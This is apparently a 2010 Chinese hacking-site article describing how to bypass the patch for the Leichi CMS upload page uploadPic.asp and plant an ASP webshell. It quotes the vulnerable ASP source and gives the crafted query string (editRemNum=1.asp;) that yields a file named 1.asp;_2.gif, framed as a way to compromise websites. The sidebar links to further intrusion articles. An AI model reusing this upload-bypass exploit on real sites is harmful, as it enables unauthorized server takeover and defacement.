首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>入侵实例>文章内容
攻破雷池最新补丁技术
来源:vfocus.net 作者:vfocus 发布时间:2010-05-26  

  大约是4月的时候出的 测试了下 应该对朋友们有用吧 如果有帮助大家就给我顶起来

  雷池上传的利用其实是很早以前的事了,后来出了补丁

  某日一人叫我拿几个站发现都有打了补丁的雷池,后来偶然间看了看代码,遂有此文

  以下是雷池上传的介绍

  ==========================================

  假如雷池的上传文件uploadPic.asp在admin目录下即admin/uploadPic.asp

  那么我们可以这样利用漏洞:

  在浏览器中输入:http://www.xxxx.com/admin/uploadPic.asp?actionType=mod& picName=webshell.asp出现上传的地方.把我们的马改成以.gif结尾的文件,上传就可以得到一个名为webshell.asp的 webshell了!

  注意,我们上传的webshell到底怎么知道上传在哪里去了呢?

  我们可以这样来找,我们查看改网站发表的文章,这里我们可以看到加了图片的文章,我们右键图片,查看属性,就可以知道上传的木马在哪个目录了,我们的木马应该就是http://www.xxxx.com/admin/upload/webshell.asp

  ================================

  打了补丁后似乎是过滤了%和.只类的符号,也就是说定义文件名是1.ASP时,返回文件名是1asp.gif

  dim upload_code,remNum,remFileName,editImageNum,actionType,editRemNum

  upload_code = trim(Request.QueryString("upload_code"))

  editImageNum = trim(Request.QueryString("editImageNum"))

  actionType = trim(Request.QueryString("actionType"))

  picName = trim(Request.QueryString("picName"))

  editRemNum = trim(Request.QueryString("editRemNum"))

  if actionType= "mod" then

  picName = Right(picName,InstrRev(picName,"/")-1)

  end if

  if upload_code = "ok" then

  '获取文章中的图片

  dim upload,file,formName,formPath,iCount

  formPath="../uppic/"

  .........

  else

  if file.FileSize>0 then ''如果 FileSize > 0 说明有文件数据

  '生成图片名字

  if actionType= "mod" then

  remFileName = replace(Right(picName,len(picName)-InstrRev(picName,"/")),".","")&".gif"

  else

  if editRemNum<>"" then

  remNum = editRemNum

  else

  Randomize

  remNum = Int((999 - 1 + 1) * Rnd + 1)&day(date)&month(date)&year(date)&hour(time)&minute(time)&second(time)

  end if

  remFileName = remNum&"_"&(editImageNum+1)&".gif"

  end if

  file.SaveAs Server.mappath(formPath&remFileName) ''保存文件

  Response.Write(formPath&remFileName)

  可以看出editRemNum不为空时remFileName = remNum&"_"&(editImageNum+1)&".gif"

  然而在接受参数时 但没有进行过滤 于是构造uploadPic.asp?actionType=od&editRemNum=1.asp;& upload_code=ok&editImageNum=1

  得到一个名为1.asp;_2.gif的WEBSHELL


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·另类网站入侵之一句话木马图片的
·0day批量拿站webshell,挖掘机是
·利用ewebeditor 5.5 - 6.0 鸡肋
·OmniPeek抓包的一点看法
·强大的嗅探工具ettercap使用教程
·Windows系统密码破解全攻略
·破解禁止SSID广播
·XSS偷取密码Cookies通用脚本
·XSS漏洞基本攻击代码
·Intel 3945ABG用OmniPeek 4.1抓
·KesionCMS V7.0科汛内容网站管理
·破解无线过滤MAC
  相关文章
·看黑客是怎样入侵防注入代码的
·入侵联通全过程
·测试一下录像效果视频,顺带说一
·Dump freebsd dir entries using
·百度游戏的一些安全隐患
·QQ2009 本地聊天记录的查看
·寻找绝对隐蔽的后门的办法
·入侵本地Mac OS X方针与技巧
·最新DVBBS8.0以上版本后台拿webs
·xxbing的一次日站过程
·重建sp_makewebtask存储过程获取
·Uchome <=2.0 后台GetWebShell漏
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved